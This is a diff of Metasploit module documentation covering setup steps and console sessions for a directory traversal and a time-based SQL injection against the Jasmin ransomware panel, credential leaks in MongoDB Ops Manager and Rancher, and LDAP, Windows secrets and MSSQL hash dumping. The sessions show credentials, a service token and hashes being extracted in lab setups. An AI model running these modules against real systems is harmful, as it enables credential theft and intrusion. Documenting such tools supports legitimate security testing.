+
+## Options
+
+### FILE
+
+File to retrieve. `etc/passwd` is the default, but
+`var/www/html/database/db_conection.php` contains the
+database credentials.
+
+## Scenarios
+
+### Jasmin installed on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/jasmin_ransomware_dir_traversal
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set verbose true
+verbose => true
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > rexploit
+[*] Reloading module...
+
+[+] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+pollinate:x:105:1::/var/cache/pollinate:/bin/false
+sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
+syslog:x:107:113::/home/syslog:/usr/sbin/nologin
+uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
+tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
+tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
+landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
+fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
+usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
+arangodb:x:998:999:ArangoDB Application User:/usr/share/arangodb3:/bin/false
+dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+postgres:x:115:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
+dovecot:x:116:122:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
+dovenull:x:117:123:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
+rtkit:x:118:124:RealtimeKit,,,:/proc:/usr/sbin/nologin
+kernoops:x:119:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+cups-pk-helper:x:120:125:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+systemd-oom:x:121:128:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
+whoopsie:x:122:129::/nonexistent:/bin/false
+geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
+avahi-autoipd:x:124:131:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+avahi:x:125:132:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
+nm-openvpn:x:126:133:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+saned:x:127:135::/var/lib/saned:/usr/sbin/nologin
+colord:x:129:136:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+sssd:x:130:137:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
+pulse:x:131:138:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+speech-dispatcher:x:132:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+gnome-initial-setup:x:133:65534::/run/gnome-initial-setup/:/bin/false
+gdm:x:134:140:Gnome Display Manager:/var/lib/gdm3:/bin/false
+mysql:x:136:143:MySQL Server,,,:/nonexistent:/bin/false
+
+[+] Saved file to: /root/.msf4/loot/20240415125844_default_127.0.0.1_jasmin.webpanel._670418.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set FILE var/www/html/data
+base/db_conection.php
+FILE => var/www/html/database/db_conection.php
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > rexploit
+[*] Reloading module...
+
+[+] <?php
+$dbcon=mysqli_connect("localhost","jasminadmin","123456");
+
+mysqli_select_db($dbcon,"jasmin_db");
+
+?>
+
+[+] Saved file to: /root/.msf4/loot/20240415125905_default_127.0.0.1_jasmin.webpanel._177654.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) >
+```
+
@@ -0,0 +1,97 @@
+## Vulnerable Application
+
+The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability
+within the login functionality. As of April 15, 2024 this was still unpatched, so all
+versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+
+Retrieving the victim's data may take a long amount of time. It is much quicker to
+get the logins, then just login to the site.
+
+### Install
+
+create a LAMP server (using php 8.2 worked for me, 7.2 did not).
+Run the following commands:
+
+```
+git clone https://github.com/codesiddhant/Jasmin-Ransomware.git
+cd Jasmin-Ransomware
+sudo cp -r Web\ Panel/* /var/www/html/
+sudo chown www-data:www-data /var/www/html/*
+sudo mysql -p
+```
+
+Execute the following SQL commands:
+
+```
+CREATE DATABASE jasmin_db;
+CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456';
+GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost';
+Exit
+```
+
+Now setup the database:
+`sudo mysql -u jasminadmin -p123456 jasmin_db < Web\ Panel/database/jasmin_db.sql`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jasmin_ransomware_sqli`
+1. Do: `set rhosts [IP]`
+1. Do: `run`
+1. You should contents from the SQL Database.
+
+## Options
+
+### VICTIMS
+
+Pull data from the Victim's table. Defaults to `false`
+
+### VICTIMLIMIT
+
+Number of rows from the victim table to pull. Defaults to `nil` which pulls all rows.
+
+## Scenarios
+
+### Jasmin installed on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/jasmin_ransomware_sqli
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set victims true
+victims => true
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > run
+
+[*] Dumping login table
+[*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(admin,''),ifnull(creds,'')) as binary)) from master)
+[*] {SQLi} Time-based injection: expecting output of length 15
+[+] Dumped table contents:
+Logins
+======
+
+ admin     creds
+ -----     -----
+ siddhant  123456
+
+[*] Dumping victim table
+[*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(machine_name,''),ifnull(computer_user,''),ifnull(ip,''),ifnull(systemid,''),ifnull(password,'')) as binary)) from victims)
+[*] {SQLi} Time-based injection: expecting output of length 428
+[+] Dumped table contents:
+Victims
+=======
+
+ machine_name     computer_user  ip              systemid                  password
+ ------------     -------------  --              --------                  --------
+ Bollywood        Salman Khan    47.247.223.177  df545f454f5d4f5d4af5      M9M99EvNpZVOWpy9Q8sZLHEP
+ DESKTOP-37Q74QH  cyberstair     47.247.223.177  96457DF79A87C7C0008A7BE7  xAS4NinH/HQKNJwsNtTWN5yD
+ FiFa             Leone Messi    47.247.223.177  cfhsfkdjkfvdd454s5g4      JDNAaz6e3oyM8cN+AGFdMl/5
+ Indian Cricket   Virat Kohli    47.247.223.177  SDGFs4F4S4FD4F4545fs      3tIHrYJqqTSBpw4lgMMck1GD
+ White House      Donald Trump   47.247.223.177  fgighefesdgvrd5g45rd4h    RJtCd9QqiCfBaSU0zQf84dvd
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
@@ -28,20 +28,25 @@ msf5 auxiliary(gather/ldap_hashdump) > options

 Module options (auxiliary/gather/ldap_hashdump):

-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   BASE_DN                     no        LDAP base DN if you already have it
-   BIND_DN                     no        The username to authenticate to LDAP server
-   BIND_PW                     no        Password for the BIND_DN
-   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
-   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT      1389             yes       The target port
-   SSL        false            no        Enable SSL on the LDAP connection
-   USER_ATTR  dn               no        LDAP attribute, that contains username
-
-
-Auxiliary action:
+   Name          Current Setting                                        Required  Description
+   ----          ---------------                                        --------  -----------
+   BASE_DN                                                              no        LDAP base DN if you already have it]
+   DOMAIN                                                               no        The domain to authenticate to
+   MAX_LOOT                                                             no        Maximum number of LDAP entries to loot
+   PASSWORD                                                             no        The password to authenticate with
+   PASS_ATTR     userPassword, sambantpassword, sambalmpassword, mailu  yes       LDAP attribute, that contains password hashes
+                 serpassword, password, pwdhistory, passwordhistory, c
+                 learpassword
+   READ_TIMEOUT  600                                                    no        LDAP read timeout in seconds
+   RHOSTS        127.0.0.1                                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
+                                                                                  tml
+   RPORT         1389                                                   yes       The target port
+   SSL           true                                                   no        Enable SSL on the LDAP connection
+   THREADS       1                                                      yes       The number of concurrent threads (max one per host)
+   USERNAME                                                             no        The username to authenticate with
+   USER_ATTR     dn                                                     no        LDAP attribute(s), that contains username

+                                                                                                                                                                                           Auxiliary action:
   Name  Description
   ----  -----------
   Dump  Dump all LDAP data
@@ -214,23 +214,33 @@ QUERY_FILE_PATH => /home/gwillcox/git/metasploit-framework/test.yaml
 msf6 auxiliary(gather/ldap_query) > show options

 Module options (auxiliary/gather/ldap_query):
-
-   Name             Current Setting                     Required  Description
-   ----             ---------------                     --------  -----------
-   BASE_DN                                              no        LDAP base DN if you already have it
-   BIND_DN          normal@daforest.com                 no        The username to authenticate to LDAP server
-   BIND_PW          thePassword123                      no        Password for the BIND_DN
-   OUTPUT_FORMAT    table                               yes       The output format to use (Accepted: csv, table, json)
-   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-fram  no        Path to the JSON or YAML file to load and run queries from
-                    ework/test.yaml
-   RHOSTS           172.27.51.83                        yes       The target host(s), see https://github.com/rapid7/metasploit-f
-                                                                  ramework/wiki/Using-Metasploit
-   RPORT            389                                 yes       The target port
-   SSL              false                               no        Enable SSL on the LDAP connection
+                                                                                                                                                                                              Name             Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   DOMAIN                              no        The domain to authenticate to
+   OUTPUT_FORMAT  table                yes       The output format to use (Accepted: csv, table, json)
+   PASSWORD       thePassword123       no        The password to authenticate with
+   RHOSTS         172.27.51.83         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+   USERNAME       normal@daforest.com  no        The username to authenticate with


-Auxiliary action:
+   When ACTION is RUN_QUERY_FILE:

+   Name             Current Setting                                    Required  Description
+   ----             ---------------                                    --------  -----------
+   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-framework/test.yaml  no        Path to the JSON or YAML file to load and run queries from
+
+
+   When ACTION is RUN_SINGLE_QUERY:
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   QUERY_ATTRIBUTES                   no        Comma separated list of attributes to retrieve from the server
+   QUERY_FILTER                       no        Filter to send to the target LDAP server to perform the query
+
+                                                                                                                                                                                           Auxiliary action:
   Name            Description
   ----            -----------
   RUN_QUERY_FILE  Execute a custom set of LDAP queries from the JSON or YAML file specified by QUERY_FILE.
@@ -0,0 +1,82 @@
+## Vulnerable Application
+
+MongoDB Ops Manager Diagnostics Archive does not redact SAML SSL Pem Key File Password
+field (`mms.saml.ssl.PEMKeyFilePassword`) within app settings. Archives do not include
+the PEM files themselves. This module extracts that unredacted password and stores
+the diagnostic archive for additional manual review.
+
+This issue affects MongoDB Ops Manager v5.0 prior to 5.0.21 and
+MongoDB Ops Manager v6.0 prior to 6.0.12.
+
+API credentials with the role of `GLOBAL_MONITORING_ADMIN` or `GLOBAL_OWNER` are required.
+
+Successfully tested against MongoDB Ops Manager v6.0.11.
+
+### Install on Ubuntu 22.04
+
+1. Download mongodb server deb from https://www.mongodb.com/download-center/community/releases/archive .
+ Look for: `Server Package: mongodb-org-server_6.0.11_amd64.deb`
+2. Download the 1.4gig ops manager (mms) deb from https://www.mongodb.com/subscription/downloads/archived
+3. `sudo apt-get install snmp`
+4. `sudo dpkg -i mongodb-org-server_6.0.11_amd64.deb`
+5. `sudo dpkg -i mongodb-mms-*`
+6. `sudo nano /opt/mongodb/mms/conf/conf-mms.properties` and add a new field at the bottom of the file: `mms.saml.ssl.PEMKeyFilePassword=FINDME`
+7. `sudo systemctl start mongod.service`
+8. `sudo systemctl start mongodb-mms.service` (wait a little while for it to initialize and run)
+9. Browse to http://<ip>>:8080/account/register and perform the install, the SMTP fields can use values for a server which doesn't exist.
+10. Top left corner of the page after install should be "Project 0", click the drop down and create new project. Any name is fine, I called it 'test'
+11. Top right of the screen, click Admin, API Keys, Create API Key. Create a new key, for permissions select
+`Global Monitoring Admin` or `Global Owner` (or both).
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info`
+1. Do: `set API_PUBKEY [API_PUBKEY]`
+1. Do: `set API_PRIVKEY [API_PRIVKEY]`
+1. Do: `run`
+1. You should find similar output to the following: `Found ubuntu22-0-bgrid's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME`
+
+## Options
+
+### API_PUBKEY
+
+Public Key for the API key that was created with `Global Monitoring Admin` or `Global Owner` permissions.
+
+### API_PRIVKEY
+
+Private Key for the API key that was created with `Global Monitoring Admin` or `Global Owner` permissions.
+
+## Scenarios
+
+### Mongodb OPS Manager 6.0.11 on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) > set API_PUBKEY zmdhriti
+API_PUBKEY => zmdhriti
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) > set API_PRIVKEY fd2faf05-18bc-4e6b-8ea1-419f3e8f95bc
+API_PRIVKEY => fd2faf05-18bc-4e6b-8ea1-419f3e8f95bc
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) > set verbose true
+verbose => true
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) > run 
+[*] Running module against 127.0.0.1
+
+[*] Checking for orgs
+[*] Looking for projects in org 65e86256961a9b1cc98c6c8b
+[+]   Found project: Project 0 (65e86256961a9b1cc98c6c8f)
+[+] Stored Project Diagnostics files to /root/.msf4/loot/20240307151114_default_127.0.0.1_mongodb.ops_mana_015137.gz
+[*]     Opening project_diagnostics.tar.gz
+[+] Found ubuntu22-0-bgrid's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
+[+] Found ubuntu22-0-mms's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
+[+]   Found project: test (65e86331961a9b1cc98c6db7)
+[+] Stored Project Diagnostics files to /root/.msf4/loot/20240307151114_default_127.0.0.1_mongodb.ops_mana_205173.gz
+[*]     Opening project_diagnostics.tar.gz
+[+] Found ubuntu22-0-bgrid's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
+[+] Found ubuntu22-0-mms's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) >
+```
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+An issue was discovered in Rancher versions up to and including
+2.5.15 and 2.6.6 where sensitive fields, like passwords, API keys
+and Ranchers service account token (used to provision clusters),
+were stored in plaintext directly on Kubernetes objects like Clusters,
+for example cluster.management.cattle.io. Anyone with read access to
+those objects in the Kubernetes API could retrieve the plaintext
+version of those sensitive data.
+
+### Install
+
+* Clone the repository from: https://github.com/fe-ax/tf-cve-2021-36782
+* Create a Digital Ocean API Token
+    * Log into Digital Ocean and navigate to: API > Tokens
+    * Select "Generate New Token"
+    * Enter a token name and then select either Full Access or Custom Scopes
+        * If selecting Custom Scopes, use the values provided below
+* Back in the `tf-cve-2021-36782`, copy the `example.tfvars` file to `yourown.tfvars`
+* Edit `yourown.tfvars` and add the newly generated DO API token as `do_token`
+    * Optionally set the region for the clusters to one closer to you (e.g. `nyc3`)
+* Run `terraform init`
+* Run `terraform apply -var-file yourown.tfvars`, this can take about 20 minutes to run
+* Take the hostname from the `rancher_admin_url` output from terraform and use that as the `RHOST` value for the module
+* Take the password from the `rancher_password` file and use that with the username "admin" for the module
+
+#### Digital Ocean API Token Custom Scopes
+It's possible that there are unnecessary privileges contained within the following settings, however it does permit the
+test environment to start without a full access token.
+
+* Fully Scoped Access:
+    * 1click (2): create, read
+    * account (1): read
+    * actions (1): read
+    * billing (1): read
+    * kubernetes (5): create, read, update, delete, access_cluster
+    * load_balancer (4): create, read, update, delete
+    * monitoring (4): create, read, update, delete
+    * project (4): create, read, update, delete
+    * regions (1): read
+    * registry (4): create, read, update, delete
+    * sizes (1): read
+* Create Access:
+    * app / droplet / firewall / ssh_key
+* Read Access:
+    * app / block_storage / block_storage_action / block_storage_snapshot / cdn / certificate / database / domain / droplet / firewall / function / image / reserved_ip / snapshot / ssh_key / tag / uptime / vpc
+* Update Access:
+    * ssh_key
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/rancher_authenticated_api_cred_exposure`
+1. Do: `set rhosts [ip]`
+1. Do: `set username [username]`
+1. Do: `set password [password]`
+1. Do: `run`
+1. If any API items of value are found, they will be printed
+
+## Options
+
+### Username
+
+Username for Rancher. user must be in one or more of the following groups:
+
+* `Cluster Owners`
+* `Cluster Members`
+* `Project Owners`
+* `Project Members`
+* `User Base`
+
+### Password
+
+Password for Rancher.
+
+## Scenarios
+
+### Docker Image
+
+```
+msf6 > use auxiliary/gather/rancher_authenticated_api_cred_exposure 
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set rhosts rancher.178.62.209.204.sslip.io
+rhosts => rancher.178.62.209.204.sslip.io
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set username readonlyuser
+username => readonlyuser
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set password readonlyuserreadonlyuser
+password => readonlyuserreadonlyuser
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set verbose true
+verbose => true
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > run
+[*] Running module against 178.62.209.204
+
+[*] Attempting login
+[-] Auxiliary aborted due to failure: unreachable: 178.62.209.204:443 - Could not connect to web service - no response
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > run
+[*] Running module against 178.62.209.204
+
+[*] Attempting login
+[+] login successful, querying APIs
+[*] Querying /v1/management.cattle.io.catalogs
+[*] Querying /v1/management.cattle.io.clusters
+[+] Found leaked key Cluster.Status.ServiceAccountToken: eyJhbGciOiJSUzI1NiIsImtpZCI6IndsUHhqR1pxX1dSbkFwVG92SFZ1RWV5WDNjbktDTmhZRVUtOFhWY2gyQ0kifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4taG52eG4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjgyOWZiN2FiLTA0NzItNDA1ZC1iOWI4LTRmNjhjYmZhNDAyMyIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.URiTKnslommru1NDTq-ClcSc9DBsQwr4_eqSCfksoIeGACwYKK3kPCxe0aVixOkWK9saFTcR46bEz7Of4BfMjUShBl89zSmaGHmlNvYd2sLssWMXbcQInC4Y7Ckti49VbBFoU5EWe-LBSiNrhZcNL6NTn00PgMlIT7OFiSugg8ar7k6Q1Suak0pW_ea1Z56bHGWD-WJM8GsYxohXX7HwYh8cyfOSd_jH6HTZ-p6qsZcWAHnREuzNwcdXqycDVxTA48XEZlfLOJDgvbyhNPssedf3os1rcWTQ5vh_NzUjyqpb8PzQOWm427XjMzBQxwSJVyu1a2TYlNXsLX9qCARjng
+[*] Querying /v1/management.cattle.io.clustertemplates
+[*] Querying /v1/management.cattle.io.notifiers
+[*] Querying /v1/project.cattle.io.sourcecodeproviderconfig
+[-] No response received from /v1/project.cattle.io.sourcecodeproviderconfig
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/catalogs
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/clusters
+[-] No response received from /k8s/clusters/local/apis/management.cattle.io/v3/clusters
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/clustertemplates
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/notifiers
+[*] Querying /k8s/clusters/local/apis/project.cattle.io/v3/sourcecodeproviderconfigs
+[*] Auxiliary module execution completed
+```
+
+The [Cluster.Status.ServiceAccountToken](https://jwt.io/#debugger-io?token=eyJhbGciOiJSUzI1NiIsImtpZCI6IndsUHhqR1pxX1dSbkFwVG92SFZ1RWV5WDNjbktDTmhZRVUtOFhWY2gyQ0kifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4taG52eG4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjgyOWZiN2FiLTA0NzItNDA1ZC1iOWI4LTRmNjhjYmZhNDAyMyIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.URiTKnslommru1NDTq-ClcSc9DBsQwr4_eqSCfksoIeGACwYKK3kPCxe0aVixOkWK9saFTcR46bEz7Of4BfMjUShBl89zSmaGHmlNvYd2sLssWMXbcQInC4Y7Ckti49VbBFoU5EWe-LBSiNrhZcNL6NTn00PgMlIT7OFiSugg8ar7k6Q1Suak0pW_ea1Z56bHGWD-WJM8GsYxohXX7HwYh8cyfOSd_jH6HTZ-p6qsZcWAHnREuzNwcdXqycDVxTA48XEZlfLOJDgvbyhNPssedf3os1rcWTQ5vh_NzUjyqpb8PzQOWm427XjMzBQxwSJVyu1a2TYlNXsLX9qCARjng) is actually a JWT token as seen in the link.
@@ -39,14 +39,15 @@ If you already have the LDAP base DN, you may set it in this option.
 msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options

-Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
-
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   BASE_DN                   no        LDAP base DN if you already have it
-   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT    636              yes       The target port
-   SSL      true             no        Enable SSL on the LDAP connection
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   BASE_DN                    no        LDAP base DN if you already have it
+   DOMAIN                     no        The domain to authenticate to
+   PASSWORD                   no        The password to authenticate with
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     636              yes       The target port
+   SSL       true             no        Enable SSL on the LDAP connection
+   USERNAME                   no        The username to authenticate with


 Auxiliary action:
@@ -2,10 +2,15 @@
 ### Description
 The `windows_secrets_dump` auxiliary module dumps SAM hashes and LSA secrets
 (including cached creds) from the remote Windows target without executing any
-agent locally. First, it reads as much data as possible from the registry and
-then save the hives locally on the target (`%SYSTEMROOT%\\random.tmp`).
-Finally, it downloads the temporary hive files and reads the rest of the data
-from it. These temporary files are removed when it's done.
+agent locally. This is done by remotely updating the registry key security
+descriptor, taking advantage of the WriteDACL privileges held by local
+administrators to set temporary read permissions.
+
+This can be disabled by setting the `INLINE` option to false and the module
+will fallback to the original implementation, which consists in saving the
+registry hives locally on the target (%SYSTEMROOT%\Temp\<random>.tmp),
+downloading the temporary hive files and reading the data from it. This
+temporary files are removed when it's done.

 On domain controllers, secrets from Active Directory is extracted using [MS-DRDS]
 DRSGetNCChanges(), replicating the attributes we need to get SIDs, NTLM hashes,
@@ -43,7 +48,10 @@ Windows XP/Server 2003 to Windows 10/Server version 2004.
 14. Verify the notes are there

 ## Options
-Apart from the standard SMB options, no other specific options are needed.
+
+### INLINE
+Use inline technique to read protected keys from the registry remotely without
+saving the hives to disk (default: true).

 ## Actions

@@ -64,7 +64,7 @@ Basic options:
 Description:
  This module dependent on the given filename extension creates either 
  a .lnk, .scf, .url, desktop.ini file which includes a reference to 
-  the the specified remote host, causing SMB connections to be 
+  the specified remote host, causing SMB connections to be 
  initiated from any user that views the file.

 References:
@@ -0,0 +1,91 @@
+## Description
+
+The `mssql_hashdump` module queries an MSSQL instance or session and returns hashed user:pass pairs. These pairs can be decripted via or `hashcat`.
+
+## Available Options
+
+```
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > options
+
+Module options (auxiliary/scanner/mssql/mssql_hashdump):
+
+   Name                 Current Setting  Required  Description
+   ----                 ---------------  --------  -----------
+   USE_WINDOWS_AUTHENT  false            yes       Use windows authentication (requires DOMAIN option set)
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   DATABASE  MSSQL            no        The database to authenticate against
+   PASSWORD                   no        The password for the specified username
+   RHOSTS                     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     1433             no        The target port (TCP)
+   THREADS   1                yes       The number of concurrent threads (max one per host)
+   USERNAME  MSSQL            no        The username to authenticate as
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+```
+
+## Scenarios
+
+With a session:
+```
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type   Information                Connection
+  --  ----  ----   -----------                ----------
+  1         mssql  MSSQL sa @ 127.0.0.1:1433  127.0.0.1:52307 -> 127.0.0.1:1433 (127.0.0.1)
+
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > run session=-1
+
+[*] Using existing session 1
+[*] Instance Name: "758549b9f69e"
+[+] Saving mssql12 = sa:0x0200F433830BDBA809805FE53E59E7A1AACF9AC21241881F76B9B95EDC713FD01C8E692705409A5C0F8A46DDB1707A283BA9307D6B3C664BB9F7652758B70262C88F629DBC7E
+[+] Saving mssql12 = ##MS_PolicyEventProcessingLogin##:0x02003F137BFF990AE7D0B89DA15EEDF4B962E200A9AAECE6AC7E4786176A08C4D278C0E9B203795F972CB508FD17827A755AF4284A9891F01C502EEBB5ECFABD7FA6CD3603E2
+[+] Saving mssql12 = ##MS_PolicyTsqlExecutionLogin##:0x0200DA9B84641F740A6423EC34F1B354FB81D9DF53456A7A7A8CCB794B295896C0CD19718C2C9537D3A7E82C41350F1549E2E2B99D819345DCABF1855AF2F83FA6CDC3EF8F96
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
